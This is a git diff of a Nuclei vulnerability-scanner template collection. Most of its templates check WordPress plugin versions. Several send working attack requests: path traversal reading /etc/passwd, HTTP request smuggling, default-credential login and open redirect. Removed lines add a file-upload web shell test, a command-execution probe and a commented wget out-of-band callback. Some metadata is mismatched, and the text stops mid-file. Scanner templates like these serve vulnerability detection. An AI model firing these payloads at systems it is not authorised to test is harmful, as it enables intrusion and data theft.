certain configurations, this can be exploitable by lower level users. We confirmed that this plugin installed with Elementor makes it possible for users with contributor-level access and above to exploit this issue. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/34f0e5a6-0bd3-4734-b7e0-27dc825d193f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-8016 + metadata: + fofa-query: "wp-content/plugins/events-calendar-pro/" + google-query: inurl:"/wp-content/plugins/events-calendar-pro/" + shodan-query: 'vuln:CVE-2024-8016' + tags: cve,wordpress,wp-plugin,events-calendar-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/events-calendar-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "events-calendar-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8108-388981d89511f13ba76287252ce2c890.yaml b/poc/cve/CVE-2024-8108-388981d89511f13ba76287252ce2c890.yaml new file mode 100644 index 0000000000..8c82cbaebd --- /dev/null +++ b/poc/cve/CVE-2024-8108-388981d89511f13ba76287252ce2c890.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8108-388981d89511f13ba76287252ce2c890 + +info: + name: > + Share This Image <= 2.01 - Authenticated (Contributor+) Stored Cross-Site Scripting via alignment Parameter + author: topscoder + severity: low + description: > + The Share This Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'alignment' parameter in all versions up to, and including, 2.01 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cb5368f-99b1-43e3-a2e4-67e90c8edfcf?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8108 + metadata: + fofa-query: "wp-content/plugins/share-this-image/" + google-query: inurl:"/wp-content/plugins/share-this-image/" + shodan-query: 'vuln:CVE-2024-8108' + tags: cve,wordpress,wp-plugin,share-this-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/share-this-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "share-this-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.01') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8252.yaml b/poc/cve/CVE-2024-8252.yaml new file mode 100644 index 0000000000..91b82e7edd --- /dev/null +++ b/poc/cve/CVE-2024-8252.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8252 + +info: + name: > + Clean Login <= 1.14.5 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + The Clean Login plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.14.5 via the 'template' attribute of the clean-login-register shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b9f99b51-e1b1-4cd3-a9f7-24e4b59811a7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-8252 + metadata: + fofa-query: "wp-content/plugins/clean-login/" + google-query: inurl:"/wp-content/plugins/clean-login/" + shodan-query: 'vuln:CVE-2024-8252' + tags: cve,wordpress,wp-plugin,clean-login,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clean-login/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clean-login" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.14.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8274.yaml b/poc/cve/CVE-2024-8274.yaml new file mode 100644 index 0000000000..e9b25614eb --- /dev/null +++ b/poc/cve/CVE-2024-8274.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8274 + +info: + name: > + WP Booking Calendar <= 10.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP Booking Calendar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via several parameters from 'timeline_obj' in all versions up to, and including, 10.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/83804c2a-2c4a-4f69-b833-dcd53ddab94d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8274 + metadata: + fofa-query: "wp-content/plugins/booking/" + google-query: inurl:"/wp-content/plugins/booking/" + shodan-query: 'vuln:CVE-2024-8274' + tags: cve,wordpress,wp-plugin,booking,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 10.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml b/poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml new file mode 100644 index 0000000000..25665a01fa --- /dev/null +++ b/poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc + +info: + name: > + WPZOOM Portfolio Lite – Filterable Portfolio Plugin <= 1.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute + author: topscoder + severity: low + description: > + The WPZOOM Portfolio Lite – Filterable Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘align’ attribute within the 'wp:wpzoom-blocks' Gutenberg block in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2e7d5503-0a6e-4611-bb7c-b2871be828be?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8276 + metadata: + fofa-query: "wp-content/plugins/wpzoom-portfolio/" + google-query: inurl:"/wp-content/plugins/wpzoom-portfolio/" + shodan-query: 'vuln:CVE-2024-8276' + tags: cve,wordpress,wp-plugin,wpzoom-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpzoom-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpzoom-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8319.yaml b/poc/cve/CVE-2024-8319.yaml new file mode 100644 index 0000000000..1928034959 --- /dev/null +++ b/poc/cve/CVE-2024-8319.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8319 + +info: + name: > + Tourfic <= 2.11.20 - Cross-Site Request Forgery in Multiple Functions + author: topscoder + severity: medium + description: > + The Tourfic plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.11.20. This is due to missing or incorrect nonce validation on the tf_order_status_email_resend_function, tf_visitor_details_edit_function, tf_checkinout_details_edit_function, tf_order_status_edit_function, tf_order_bulk_action_edit_function, tf_remove_room_order_ids, and tf_delete_old_review_fields functions. This makes it possible for unauthenticated attackers to resend order status emails, update visitor/order details, edit check-in/out details, edit order status, perform bulk order status updates, remove room order IDs, and delete old review fields, respectively, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/07fa7b1a-9137-4049-a20a-8eb6df7ca578?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8319 + metadata: + fofa-query: "wp-content/plugins/tourfic/" + google-query: inurl:"/wp-content/plugins/tourfic/" + shodan-query: 'vuln:CVE-2024-8319' + tags: cve,wordpress,wp-plugin,tourfic,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tourfic/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tourfic" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.11.20') \ No newline at end of file diff --git a/poc/cve/cve-2001-1473.yaml b/poc/cve/cve-2001-1473.yaml index d7ad14a2d1..80480efb7b 100644 --- a/poc/cve/cve-2001-1473.yaml +++ b/poc/cve/cve-2001-1473.yaml @@ -1,11 +1,11 @@ id: CVE-2001-1473 + info: name: Deprecated SSHv1 Protocol Detection author: iamthefrogy severity: high - tags: cve,cve2001,network,ssh,openssh + description: SSHv1 is deprecated and has known cryptographic issues. - remediation: Upgrade to SSH 2.4 or later. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 @@ -14,13 +14,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cve-id: CVE-2001-1473 cwe-id: CWE-310 + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: word words: - "SSH-1" - -# Updated by Chris on 2022/01/21 diff --git a/poc/cve/cve-2008-5587.yaml b/poc/cve/cve-2008-5587.yaml index e714f96cca..fda684a006 100644 --- a/poc/cve/cve-2008-5587.yaml +++ b/poc/cve/cve-2008-5587.yaml @@ -1,27 +1,28 @@ id: CVE-2008-5587 - info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium - reference: https://www.exploit-db.com/exploits/7363 - + description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/7363 + - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ + - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 + - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 + classification: + cve-id: CVE-2008-5587 metadata: - shodan-query: 'http.title:"phpPgAdmin"' - description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." - + shodan-query: http.title:"phpPgAdmin" + tags: cve,cve2008,lfi,phppgadmin requests: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml index 0cf11fcf80..668fd715ec 100644 --- a/poc/cve/cve-2016-6210.yaml +++ b/poc/cve/cve-2016-6210.yaml @@ -1,9 +1,10 @@ id: CVE-2016-6210 + info: name: OpenSSH username enumeration < v7.3 author: iamthefrogy,forgedhallpass severity: medium - tags: cve,cve2016,network,openssh + description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 @@ -15,15 +16,18 @@ info: cvss-score: 5.9 cve-id: CVE-2016-6210 cwe-id: CWE-200 + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' + extractors: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file diff --git a/poc/cve/cve-2017-14524.yaml b/poc/cve/cve-2017-14524.yaml index 20a95213bc..e87149510b 100644 --- a/poc/cve/cve-2017-14524.yaml +++ b/poc/cve/cve-2017-14524.yaml @@ -1,43 +1,25 @@ id: CVE-2017-14524 - info: - name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect + name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect author: 0x_Akoko - severity: medium - description: | - OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. - remediation: | - Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. + severity: low + description: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks. reference: - https://seclists.org/fulldisclosure/2017/Sep/57 - - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 - - https://nvd.nist.gov/vuln/detail/CVE-2017-14524 - - http://seclists.org/fulldisclosure/2017/Sep/57 - - https://github.com/ARPSyndicate/cvemon + - https://www.cvedetails.com/cve/CVE-2017-14524 + - https://vuldb.com/?id.107201 + tags: cve,cve2017,redirect,opentext classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 cve-id: CVE-2017-14524 cwe-id: CWE-601 - epss-score: 0.00258 - epss-percentile: 0.6357 - cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: opentext - product: documentum_administrator - tags: cve2017,cve,redirect,opentext,seclists - -http: +requests: - method: GET path: - - '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' - + - '{{BaseURL}}/xda/help/en/default.htm?startat=//example.com' matchers: - type: regex - part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' -# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/poc/cve/cve-2021-44451.yaml b/poc/cve/cve-2021-44451.yaml index 71a197e9fd..bc69c3ca6e 100644 --- a/poc/cve/cve-2021-44451.yaml +++ b/poc/cve/cve-2021-44451.yaml @@ -1,4 +1,5 @@ id: CVE-2021-44451 + info: name: Apache Superset Default Login author: dhiyaneshDK @@ -11,12 +12,14 @@ info: tags: apache, default-login classification: cve-id: CVE-2021-44451 + requests: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} + - | POST /login/ HTTP/1.1 Host: {{Hostname}} @@ -25,12 +28,14 @@ requests: Referer: {{BaseURL}}/admin/airflow/login csrf_token={{csrf_token}}&username={{username}}&password={{password}} + attack: pitchfork payloads: username: - admin password: - admin + extractors: - type: regex name: csrf_token @@ -39,6 +44,7 @@ requests: internal: true regex: - 'value="(.*?)">' + matchers-condition: and matchers: - type: word @@ -48,10 +54,12 @@ requests: - 'Redirecting...' - '

Redirecting...' + - type: word part: header words: - 'session' + - type: status status: - 302 diff --git a/poc/header/header-injection.yaml b/poc/header/header-injection.yaml index daf402fa73..d1774491f4 100644 --- a/poc/header/header-injection.yaml +++ b/poc/header/header-injection.yaml @@ -7,7 +7,7 @@ info: description: Fuzzing headers for OOB SSRF tags: fuzz,ssrf -requests: +http: - payloads: header: helpers/payloads/proxy-headers.txt diff --git a/poc/http/cl-te-http-smuggling.yaml b/poc/http/cl-te-http-smuggling.yaml index 278b84146d..ddb83e064d 100644 --- a/poc/http/cl-te-http-smuggling.yaml +++ b/poc/http/cl-te-http-smuggling.yaml @@ -1,35 +1,37 @@ -id: CL-TE-http-smuggling -info: - name: HTTP request smuggling, basic CL.TE vulnerability - author: pdteam, akincibor - severity: Low -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - unsafe: true - matchers: - - type: dsl - dsl: - - 'contains(body, "Unrecognized method GPOST")' +id: CL-TE-http-smuggling + +info: + name: HTTP request smuggling, basic CL.TE vulnerability + author: pdteam, akincibor + severity: Low + +http: + - raw: + - |+ + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + - |+ + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + + unsafe: true + matchers: + - type: dsl + dsl: + - 'contains(body, "Unrecognized method GPOST")' \ No newline at end of file diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml index 538f6fd6d5..cd961f6e81 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml @@ -1,35 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" - http: - - raw: - - | - POST /center/api/files;.html HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a-- - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "test.jsp")' - condition: and + - type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/poc/other/Nsfocus_sas_getFile_read.yaml b/poc/other/Nsfocus_sas_getFile_read.yaml index b35ef84818..1cd783867f 100644 --- a/poc/other/Nsfocus_sas_getFile_read.yaml +++ b/poc/other/Nsfocus_sas_getFile_read.yaml @@ -1,11 +1,11 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in metadata: fofa-query: body="'/needUsbkey.php?username='" hunter-query: web.body="'/needUsbkey.php?username='" @@ -14,36 +14,15 @@ info: http: - method: GET path: - - "{{BaseURL}}/webconf/Exec/index?cmd=id" + - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: word part: body words: - - "200" + - "nologin" - type: status status: - 200 - - -# http: -# - method: GET -# path: -# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" - -# attack: clusterbomb -# matchers-condition: or -# matchers: -# - type: word -# part: interactsh_protocol -# name: http -# words: -# - "http" - -# - type: word -# part: interactsh_protocol -# name: dns -# words: -# - "dns" diff --git a/poc/other/attire-018e03e3d84deb0b9ea4b368a9e735bb.yaml b/poc/other/attire-018e03e3d84deb0b9ea4b368a9e735bb.yaml new file mode 100644 index 0000000000..94b1dcb24b --- /dev/null +++ b/poc/other/attire-018e03e3d84deb0b9ea4b368a9e735bb.yaml @@ -0,0 +1,59 @@ +id: attire-018e03e3d84deb0b9ea4b368a9e735bb + +info: + name: > + Attire <= 2.0.6 - Authenticated (Contributor+) PHP Object Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f21cbe18-77e1-4a9a-96a0-74edaef0db3e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/attire/" + google-query: inurl:"/wp-content/themes/attire/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,attire,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/attire/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "attire" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.6') \ No newline at end of file diff --git a/poc/other/events-calendar-pro.yaml b/poc/other/events-calendar-pro.yaml new file mode 100644 index 0000000000..d39c81e84a --- /dev/null +++ b/poc/other/events-calendar-pro.yaml @@ -0,0 +1,59 @@ +id: events-calendar-pro + +info: + name: > + The Events Calendar Pro <= 7.0.2 - Authenticated (Administrator+) PHP Object Injection to Remote Code Execution + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/34f0e5a6-0bd3-4734-b7e0-27dc825d193f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/events-calendar-pro/" + google-query: inurl:"/wp-content/plugins/events-calendar-pro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,events-calendar-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/events-calendar-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "events-calendar-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.0.2') \ No newline at end of file diff --git a/poc/other/jenk.yaml b/poc/other/jenk.yaml index 1ce87d12b2..62a1aba442 100644 --- a/poc/other/jenk.yaml +++ b/poc/other/jenk.yaml @@ -53,4 +53,4 @@ javascript: group: 1 regex: - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' -# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/share-this-image-1c9c43ea93da339cf4ddfe98cd5e553a.yaml b/poc/other/share-this-image-1c9c43ea93da339cf4ddfe98cd5e553a.yaml new file mode 100644 index 0000000000..a4e88cf74a --- /dev/null +++ b/poc/other/share-this-image-1c9c43ea93da339cf4ddfe98cd5e553a.yaml @@ -0,0 +1,59 @@ +id: share-this-image-1c9c43ea93da339cf4ddfe98cd5e553a + +info: + name: > + Share This Image <= 2.01 - Authenticated (Contributor+) Stored Cross-Site Scripting via alignment Parameter + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cb5368f-99b1-43e3-a2e4-67e90c8edfcf?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/share-this-image/" + google-query: inurl:"/wp-content/plugins/share-this-image/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,share-this-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/share-this-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "share-this-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.01') \ No newline at end of file diff --git a/poc/other/td-composer-3b0822f9c769d60e753b8fc716feb8bc.yaml b/poc/other/td-composer-3b0822f9c769d60e753b8fc716feb8bc.yaml new file mode 100644 index 0000000000..97850623ba --- /dev/null +++ b/poc/other/td-composer-3b0822f9c769d60e753b8fc716feb8bc.yaml @@ -0,0 +1,59 @@ +id: td-composer-3b0822f9c769d60e753b8fc716feb8bc + +info: + name: > + tagDiv Composer <= 5.0 - Reflected Cross-Site Scripting via envato_code[] + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ed9db9c1-c6b5-459e-9820-ec4ee47b244e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/td-composer/" + google-query: inurl:"/wp-content/plugins/td-composer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,td-composer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/td-composer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "td-composer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0') \ No newline at end of file diff --git a/poc/other/td-composer-a84bf528fd8a808bc88b049d18e64cda.yaml b/poc/other/td-composer-a84bf528fd8a808bc88b049d18e64cda.yaml new file mode 100644 index 0000000000..258c78ae0d --- /dev/null +++ b/poc/other/td-composer-a84bf528fd8a808bc88b049d18e64cda.yaml @@ -0,0 +1,59 @@ +id: 